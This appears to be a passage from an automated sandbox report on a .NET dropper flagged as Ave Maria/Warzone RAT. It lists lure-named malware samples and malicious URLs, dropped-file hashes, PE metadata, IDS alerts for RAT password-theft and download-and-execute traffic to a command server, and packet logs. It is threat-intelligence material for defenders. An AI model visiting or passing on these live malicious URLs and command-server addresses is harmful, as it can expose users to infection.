                                  • www.eiwex.com/sfi3/?UlZl=Y+/cFti0GUb4R6gBsd3Lr00pZeHumJdECMpeztZPWstrcgNtbt9jKBPof7TwhYcagWTkrT97WjZouGl3PJfspdg1zV1TELrgow==&2dox=X2JL
                                  Swift.exeGet hashmaliciousBrowse
                                  • www.barmanon5.pro/b31b/?lTkLp=QFC5kflo2W9xiWPHk6PVZq5LNtx9PE4uciQ0+TaWAe5dGm0MZgEm/6IYv+k7jhxT2GZX&s2MHE=y8UpS6w
                                  DHL Invoice Details_pdf.exeGet hashmaliciousBrowse
                                  • www.uula.shop/j17j/?q81=ocl2t9wPLn3rySApupcGUIGkq6SFI7WqimoV3x7GqXJo0G+nrWoDjkc7nNdFko8eBnl8gwW7/A==&YP=2dL8spvh06GD
                                  proforma corregida.exeGet hashmaliciousBrowse
                                  • www.all-about-chandeliers.com/tc10/?C0G=xmlXRh7t1LNA11YQxrFH8v7GzKMnvtnvMT+M318jxWtPCSxV5zFJ4IVhKgltDtotnTqeZNjdhQ==&s2Jtf=2dQtW2l0Zdq
                                  FedEx Docs.exeGet hashmaliciousBrowse
                                  • www.mensfitnesstalk.com/fqsu/?GVE=Zf4p&TR-pfv=dTNBrpqYyfl45l0DWGwzRvffp7Lk5FRBAdQBLPfi59LEdsyrTAH8GlhDXz9eaN7eTYpZdFI9fl5mry3LQD3aF1lF9+RH2lD48Q==
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  filetransfer.ioADLINK-TECH PO#2220002637.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  mona.lerioprovantageOrder25-10-2022.scr.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  __ - ____.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  Quote 09-26-2022RFQ-994902093002039902934890.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  Purchase Order 30 August 2022-02414291423394140374553.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  SecuriteInfo.com.MSIL.Downloadergen8.22889.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  SecuriteInfo.com.MSIL.Downloadergen8.27157.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  VPO - SP.9686 Flex rev 2 - BL65338.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  vVk8dcU6G4.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  4Og0CsceeU.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  06-21-2022 Order _8678498578378598489304885909394899.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  06202022-excenes_PO-025194813673839029122-9692001343.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  InvoicesRemittanceContractOrder- Multi-Lines .exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  20220614QUOTATIONTB04888376466374.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  SecuriteInfo.com.Trojan.YakbeexMSIL.ZZ4.8630.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  SecuriteInfo.com.BackDoor.SiggenNET.35.30620.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  PO_IN00043INBOM_Specifications Sheet^^^^^dwg.exeGet hashmaliciousBrowse
                                  • 188.114.96.7
                                  POIN00043INBOMSpecifications Sheet^^^^^dwg.sc.exeGet hashmaliciousBrowse
                                  • 188.114.97.7
                                  PO - Drawings And Specifications Sheet^^^^^dwg.exeGet hashmaliciousBrowse
                                  • 188.114.97.7
                                  PO - Drawings And Specifications Sheet^^^^^dwg.exeGet hashmaliciousBrowse
                                  • 188.114.96.7
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  CLOUDFLARENETUShttps://po48302-settle.s3.us-west-004.backblazeb2.com/index+(4).htmlGet hashmaliciousBrowse
                                  • 104.17.25.14
                                  file.exeGet hashmaliciousBrowse
                                  • 188.114.96.3
                                  https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652Get hashmaliciousBrowse
                                  • 104.18.27.85
                                  https://bafybeiajl7jy5rq7cttxjilmyeun7jxorxidbcrh6td4a5z6om7jqgofiq.ipfs.w3s.link/meuro4elpez_cham-e.html#glenergy@glenergy.comGet hashmaliciousBrowse
                                  • 104.18.22.52
                                  https://indd.adobe.com/view/fd4651d1-f41c-4be3-ad8a-eb3a15958d59Get hashmaliciousBrowse
                                  • 104.17.25.14
                                  https://itb.tc/MTI2Mjk0OTI0OQ==ibmxWjJWdUxYQmhaMlY0TFRFeU5UQXdOakEyT0RGcFptVjBZMmg0YTNCaGNuTnNiM2RwYzJWamRYSmxaSGhqWlc1MGNtRnNNUzVqYjIwPQ==Get hashmaliciousBrowse
                                  • 172.66.40.112
                                  Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                  • 104.17.25.14
                                  Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                  • 104.17.24.14
                                  EaseUS-Data-Recovery_nvj6jOeq.exeGet hashmaliciousBrowse
                                  • 188.114.97.9
                                  New_Financia1_Report.htmGet hashmaliciousBrowse
                                  • 104.17.25.14
                                  New_Financia1_Report.htmGet hashmaliciousBrowse
                                  • 104.17.25.14
                                  Eurial DOCS.htmlGet hashmaliciousBrowse
                                  • 104.17.24.14
                                  http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2Get hashmaliciousBrowse
                                  • 104.17.24.14
                                  Policy handbook.htmlGet hashmaliciousBrowse
                                  • 104.17.24.14
                                  New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                  • 172.67.214.243
                                  D009780.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  http://4xn.se4.hidroage.com/#.aHR0cHM6Ly9zdG9yYWdlYXBpLmZsZWVrLmNvLzIyMTBjMGMxLTFkZjktNGRkYi1hNzA5LTM2OGVmZTliNjk0My1idWNrZXQvUEFHRSBORVcuaHRtbCNhbnRvbi5sb3V3aW5nZXJAY21zLWRzYi5jb20=Get hashmaliciousBrowse
                                  • 104.18.7.145
                                  PEDIDO NOVIEMBRE_29-11-22.exeGet hashmaliciousBrowse
                                  • 104.18.115.97
                                  E-DEKONT.exeGet hashmaliciousBrowse
                                  • 104.21.44.194
                                  SecuriteInfo.com.Win32.PWSX-gen.16062.16220.exeGet hashmaliciousBrowse
                                  • 104.18.115.97
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  SkyNet.1448.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  SkyNet.1448.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  solicitud de presupuesto 29-11-2022.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  library.dllGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  MEPS-42.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  11-29-22.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  ORDER.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  Quotation.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  Wzf4gWTOC2.exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  AWB DHL 7214306201 Shipment.pdf (432).exeGet hashmaliciousBrowse
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  No context
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):5829
                                  Entropy (8bit):4.902247628650607
                                  Encrypted:false
                                  SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                  MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                  SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                  SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                  SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                  Malicious:false
                                  Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15676
                                  Entropy (8bit):5.553114530083217
                                  Encrypted:false
                                  SSDEEP:384:Kte/UYhZPTRDNaSjnyulPsFvI1vs4oaYP:3h5lsoyul0CSBP
                                  MD5:7A2B1C5C62100A3062D423C48A2C2F52
                                  SHA1:18978F9AF89F2C877AE26A5529B8D3644C0ED353
                                  SHA-256:05C941DB1B395E6EA1839E3913ED1702C73AFF477556387D1E536A94A78B9FC1
                                  SHA-512:3A80C4A3539187AFBE7EE18C1BCA045B862A7BB069EB71DF2F5EF4ADD7168F12352BF5F8D8BAE987A686BE82E1BD7E2DA64293CC0F72CDEBE027FF3F31874242
                                  Malicious:false
                                  Preview:@...e...........9.........b.{.o.G.....g..............@..........H...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):1056256
                                  Entropy (8bit):7.998564189235208
                                  Encrypted:true
                                  SSDEEP:24576:fWOJrKG6vIyZCx67yqfQC40xquBsdq8Uz7REU4R9:fWOz6wyU6ML0dsdq8UJB4
                                  MD5:373574C70AB6F299813FDAFA9C12AB9B
                                  SHA1:E6DBFBBE58F87E70DA25F5CD31E526DDBCEB679E
                                  SHA-256:AD8184627690F50DA83D52FA3B92ED2597E279527821FFDEDE20240D19CC3E21
                                  SHA-512:4EC3F08AA83DB8FEDF0ACA9F0FDCB3237AFC35F34BA1ADEE6F3372D4AEC2B544DB5BB892E49F8C8A00A82C10C8BA697FF21D161D44F7695A1EAC132C190E3DD5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 38%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c.............................2... ...@....@.. ....................................`..................................2..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H........#...............#......................................................F...-.&(....+.&+.*br...p(.....-.&+......+.*F...,.&(....+.&+.*6.-.+.(....+.*6.-.+.(....+.*6.,.+.(....+.*.~....,.*..-!&(....t,...r...p .......o:...,.+......+.(;...*...0..........~.....-.&......%......-.&&.-.&s.....+...+.(....+...+.s...... ....o..... ....o....(....rm..po.......... ....s........o.....[o....o.......o.....[o....o......o.........o.....s ...........io!.......o".....o#........o".....o"....
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.998564189235208
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File size:1056256
                                  MD5:373574c70ab6f299813fdafa9c12ab9b
                                  SHA1:e6dbfbbe58f87e70da25f5cd31e526ddbceb679e
                                  SHA256:ad8184627690f50da83d52fa3b92ed2597e279527821ffdede20240d19cc3e21
                                  SHA512:4ec3f08aa83db8fedf0aca9f0fdcb3237afc35f34ba1adee6f3372d4aec2b544db5bb892e49f8c8a00a82c10c8ba697ff21d161d44f7695a1eac132c190e3dd5
                                  SSDEEP:24576:fWOJrKG6vIyZCx67yqfQC40xquBsdq8Uz7REU4R9:fWOz6wyU6ML0dsdq8UJB4
                                  TLSH:17253359A37F8E3DC8853E309B8BD0C8A57B1ED0D9D96264F18C898F5AB60D32B11F51
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.............................2... ...@....@.. ....................................`................................
                                  Icon Hash:00828e8e8686b000
                                  Entrypoint:0x5032ee
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6385E5A1 [Tue Nov 29 10:57:37 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1032a00x4b.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1040000x4f8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1060000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x1012f40x101400False0.9982936254859086data7.999494429591008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0x1040000x4f80x600False0.3717447916666667data3.8698428692096263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1060000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountry
                                  RT_VERSION0x1040a00x254data
                                  RT_MANIFEST0x1042f40x204XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (513), with no line terminators
                                  DLLImport
                                  mscoree.dll_CorExeMain
                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.462.102.148.15849698626412852347 11/29/22-16:56:37.231932TCP2852347ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse4969862641192.168.2.462.102.148.158
                                  62.102.148.158192.168.2.462641496982852350 11/29/22-16:56:37.391216TCP2852350ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand626414969862.102.148.158192.168.2.4
                                  192.168.2.462.102.148.15849698626412852355 11/29/22-16:56:37.392528TCP2852355ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule4969862641192.168.2.462.102.148.158
                                  192.168.2.462.102.148.15849698626412852352 11/29/22-16:56:37.392528TCP2852352ETPRO TROJAN Ave Maria/Warzone RAT DownloadAndExecuteCommand4969862641192.168.2.462.102.148.158
                                  192.168.2.462.102.148.15849698626412839088 11/29/22-16:56:40.347271TCP2839088ETPRO TROJAN Ave Maria RAT Encrypted CnC KeepAlive Outbound (2)4969862641192.168.2.462.102.148.158
                                  62.102.148.158192.168.2.462641496982852346 11/29/22-16:56:37.208383TCP2852346ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket626414969862.102.148.158192.168.2.4
                                  192.168.2.462.102.148.15849698626412839089 11/29/22-16:56:37.392528TCP2839089ETPRO TROJAN Ave Maria RAT Encrypted CnC Checkin (2)4969862641192.168.2.462.102.148.158
                                  192.168.2.462.102.148.15849698626412852351 11/29/22-16:56:40.347271TCP2852351ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse4969862641192.168.2.462.102.148.158
                                  62.102.148.158192.168.2.462641496982852354 11/29/22-16:56:38.680309TCP2852354ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse626414969862.102.148.158192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 16:55:21.258791924 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.279797077 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.279995918 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.281394958 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.302222013 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.351871014 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.351898909 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.352025032 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.398704052 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.398777962 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.398852110 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.460002899 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.460058928 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.516864061 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.516948938 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.522449017 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.522485971 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.523241997 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.730907917 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.731012106 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.965739965 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.965787888 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:22.374121904 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:22.561184883 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:22.561218977 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:22.565197945 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:22.601255894 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.601308107 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.601404905 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.602211952 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.602230072 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.654350996 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.654522896 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.668250084 CET49697443192.168.2.4188.114.97.3
